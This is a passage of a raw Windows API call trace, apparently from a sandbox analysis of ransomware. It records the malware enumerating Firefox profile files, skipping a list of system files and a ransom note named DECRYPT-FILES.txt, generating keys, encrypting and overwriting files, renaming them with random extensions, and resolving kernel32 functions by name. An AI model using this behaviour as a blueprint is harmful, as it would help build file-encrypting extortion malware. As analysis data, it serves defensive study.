lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0184.598] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0184.598] lstrcpyA (in: lpString1=0x36fc938, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0184.598] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0184.598] lstrcpyA (in: lpString1=0x36fc938, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0184.598] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0184.598] lstrcpyA (in: lpString1=0x36fc938, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0184.598] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0184.598] lstrcpyA (in: lpString1=0x36fc938, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0184.598] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0184.598] lstrcpyA (in: lpString1=0x36fc938, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0184.598] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0184.598] lstrcpyA (in: lpString1=0x36fc938, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0184.598] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0184.598] lstrcpyA (in: lpString1=0x36fc938, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0184.598] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0184.598] lstrcpyA (in: lpString1=0x36fc938, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0184.598] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0184.598] lstrcpyA (in: lpString1=0x36fc938, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0184.598] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0184.598] lstrcpyA (in: lpString1=0x36fc938, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0184.598] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0184.598] lstrcpyA (in: lpString1=0x36fc938, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0184.598] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0184.598] lstrcpyA (in: lpString1=0x36fc938, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0184.598] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0184.598] lstrcpyA (in: lpString1=0x36fc938, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0184.598] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0184.598] lstrcpyA (in: lpString1=0x36fc938, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0184.598] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0184.598] lstrcpyA (in: lpString1=0x36fc938, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0184.598] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0184.598] lstrcpyA (in: lpString1=0x36fc938, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0184.598] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0184.598] lstrcpyA (in: lpString1=0x36fc938, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0184.599] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0184.599] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json.KAUJZJ") returned 115 [0184.599] wsprintfW (in: param_1=0x36fd5f0, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json.KAUJZJ.inAe9") returned 121 [0184.599] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json.KAUJZJ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\webapps.json.kaujzj"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json.KAUJZJ.inAe9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\webapps.json.kaujzj.inae9"), dwFlags=0x0) returned 1 [0184.599] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.600] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.600] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.600] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80cff0f0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x80cff0f0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xad30f740, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x10a, dwReserved0=0x0, dwReserved1=0x0, cFileName="webapps.json.KAUJZJ", cAlternateFileName="WEBAPP~1.KAU")) returned 0 [0184.600] FindClose (in: hFindFile=0x4799f8 | out: hFindFile=0x4799f8) returned 1 [0184.600] CloseHandle (hObject=0x284) returned 1 [0184.600] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb66495d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb66495d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xad3358a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18108, dwReserved0=0x0, dwReserved1=0x0, cFileName="webappsstore.sqlite.X4lNw38", cAlternateFileName="WEBAPP~1.X4L")) returned 1 [0184.600] lstrcmpiW (lpString1="webappsstore.sqlite.X4lNw38", lpString2="DECRYPT-FILES.txt") returned 1 [0184.600] lstrcmpiW (lpString1="webappsstore.sqlite.X4lNw38", lpString2="autorun.inf") returned 1 [0184.600] lstrcmpiW (lpString1="webappsstore.sqlite.X4lNw38", lpString2="boot.ini") returned 1 [0184.601] lstrcmpiW (lpString1="webappsstore.sqlite.X4lNw38", lpString2="desktop.ini") returned 1 [0184.601] lstrcmpiW (lpString1="webappsstore.sqlite.X4lNw38", lpString2="ntuser.dat") returned 1 [0184.601] lstrcmpiW (lpString1="webappsstore.sqlite.X4lNw38", lpString2="iconcache.db") returned 1 [0184.601] lstrcmpiW (lpString1="webappsstore.sqlite.X4lNw38", lpString2="bootsect.bak") returned 1 [0184.601] lstrcmpiW (lpString1="webappsstore.sqlite.X4lNw38", lpString2="ntuser.dat.log") returned 1 [0184.601] lstrcmpiW (lpString1="webappsstore.sqlite.X4lNw38", lpString2="thumbs.db") returned 1 [0184.601] lstrcmpiW (lpString1="webappsstore.sqlite.X4lNw38", lpString2="Bootfont.bin") returned 1 [0184.601] lstrlenW (lpString="webappsstore.sqlite.X4lNw38") returned 27 [0184.601] lstrcmpiW (lpString1="X4lNw38", lpString2="lnk") returned 1 [0184.601] lstrcmpiW (lpString1="X4lNw38", lpString2="exe") returned 1 [0184.601] lstrcmpiW (lpString1="X4lNw38", lpString2="sys") returned 1 [0184.601] lstrcmpiW (lpString1="X4lNw38", lpString2="dll") returned 1 [0184.601] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0184.601] lstrlenW (lpString="webappsstore.sqlite.X4lNw38") returned 27 [0184.601] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0184.601] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="webappsstore.sqlite.X4lNw38" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite.X4lNw38") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite.X4lNw38" [0184.601] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.601] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite.X4lNw38" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webappsstore.sqlite.x4lnw38"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0184.601] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=98568) returned 1 [0184.601] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0184.602] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.603] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.603] CloseHandle (hObject=0x288) returned 1 [0184.603] CloseHandle (hObject=0x284) returned 1 [0184.603] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.603] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb66495d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb66495d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xad3358a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18108, dwReserved0=0x0, dwReserved1=0x0, cFileName="webappsstore.sqlite.X4lNw38", cAlternateFileName="WEBAPP~1.X4L")) returned 0 [0184.603] FindClose (in: hFindFile=0x4799b8 | out: hFindFile=0x4799b8) returned 1 [0184.603] CloseHandle (hObject=0x27c) returned 1 [0184.603] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xad35ba00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xad35ba00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="silmbjec.default\\", cAlternateFileName="SILMBJ~1.DEF")) returned 0 [0184.604] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0184.604] CloseHandle (hObject=0x274) returned 1 [0184.604] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xad381b60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x177, dwReserved0=0x0, dwReserved1=0x0, cFileName="profiles.ini.AXnK", cAlternateFileName="PROFIL~1.AXN")) returned 1 [0184.604] lstrcmpiW (lpString1="profiles.ini.AXnK", lpString2="DECRYPT-FILES.txt") returned 1 [0184.604] lstrcmpiW (lpString1="profiles.ini.AXnK", lpString2="autorun.inf") returned 1 [0184.604] lstrcmpiW (lpString1="profiles.ini.AXnK", lpString2="boot.ini") returned 1 [0184.604] lstrcmpiW (lpString1="profiles.ini.AXnK", lpString2="desktop.ini") returned 1 [0184.604] lstrcmpiW (lpString1="profiles.ini.AXnK", lpString2="ntuser.dat") returned 1 [0184.604] lstrcmpiW (lpString1="profiles.ini.AXnK", lpString2="iconcache.db") returned 1 [0184.604] lstrcmpiW (lpString1="profiles.ini.AXnK", lpString2="bootsect.bak") returned 1 [0184.604] lstrcmpiW (lpString1="profiles.ini.AXnK", lpString2="ntuser.dat.log") returned 1 [0184.604] lstrcmpiW (lpString1="profiles.ini.AXnK", lpString2="thumbs.db") returned -1 [0184.604] lstrcmpiW (lpString1="profiles.ini.AXnK", lpString2="Bootfont.bin") returned 1 [0184.604] lstrlenW (lpString="profiles.ini.AXnK") returned 17 [0184.604] lstrcmpiW (lpString1="AXnK", lpString2="lnk") returned -1 [0184.604] lstrcmpiW (lpString1="AXnK", lpString2="exe") returned -1 [0184.604] lstrcmpiW (lpString1="AXnK", lpString2="sys") returned -1 [0184.604] lstrcmpiW (lpString1="AXnK", lpString2="dll") returned -1 [0184.604] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0184.604] lstrlenW (lpString="profiles.ini.AXnK") returned 17 [0184.604] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0184.604] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="profiles.ini.AXnK" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini.AXnK") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini.AXnK" [0184.604] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.604] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini.AXnK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini.axnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x274 [0184.605] GetFileSizeEx (in: hFile=0x274, lpFileSize=0x36fdd30 | out: lpFileSize=0x36fdd30*=375) returned 1 [0184.605] CreateFileMappingW (hFile=0x274, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x278 [0184.605] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.605] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0184.605] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0184.605] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0184.606] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fdc98*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fdc98*=0x100) returned 1 [0184.606] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0184.606] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.606] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.607] CloseHandle (hObject=0x278) returned 1 [0184.607] SetFilePointerEx (in: hFile=0x274, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.607] WriteFile (in: hFile=0x274, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fdcb8, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fdcb8*=0x108, lpOverlapped=0x0) returned 1 [0184.608] CloseHandle (hObject=0x0) returned 0 [0184.608] CloseHandle (hObject=0x274) returned 1 [0184.608] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.608] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.608] GetTickCount () returned 0x113565b [0184.608] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.608] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0184.608] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0184.609] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0184.609] lstrlenA (lpString="kernel32.dll") returned 12 [0184.609] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0184.609] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0184.609] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0184.609] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0184.609] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0184.609] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0184.609] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0184.609] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0184.609] lstrlenA (lpString="ADDATOMA") returned 8 [0184.609] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0184.609] lstrlenA (lpString="ADDATOMW") returned 8 [0184.609] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0184.609] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0184.609] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0184.609] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0184.609] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0184.609] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0184.610] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0184.610] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0184.610] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0184.610] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0184.610] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0184.610] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0184.610] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0184.610] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0184.610] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0184.610] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0184.610] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0184.610] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0184.610] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0184.610] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0184.610] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0184.610] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0184.610] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0184.610] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0184.610] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0184.610] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0184.610] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0184.610] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0184.610] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0184.610] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0184.610] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0184.610] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0184.610] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0184.610] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0184.610] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0184.610] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0184.610] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0184.610] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0184.610] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0184.610] lstrlenA (lpString="BACKUPREAD") returned 10 [0184.610] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0184.610] lstrlenA (lpString="BACKUPSEEK") returned 10 [0184.610] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0184.610] lstrlenA (lpString="BACKUPWRITE") returned 11 [0184.610] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0184.611] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0184.611] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0184.611] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0184.611] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0184.611] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0184.611] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0184.611] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0184.611] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0184.611] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0184.611] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0184.611] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0184.611] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0184.611] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0184.611] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0184.611] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0184.611] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0184.611] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0184.611] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0184.611] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0184.611] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0184.611] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0184.611] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0184.611] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0184.611] lstrcpyA (in: 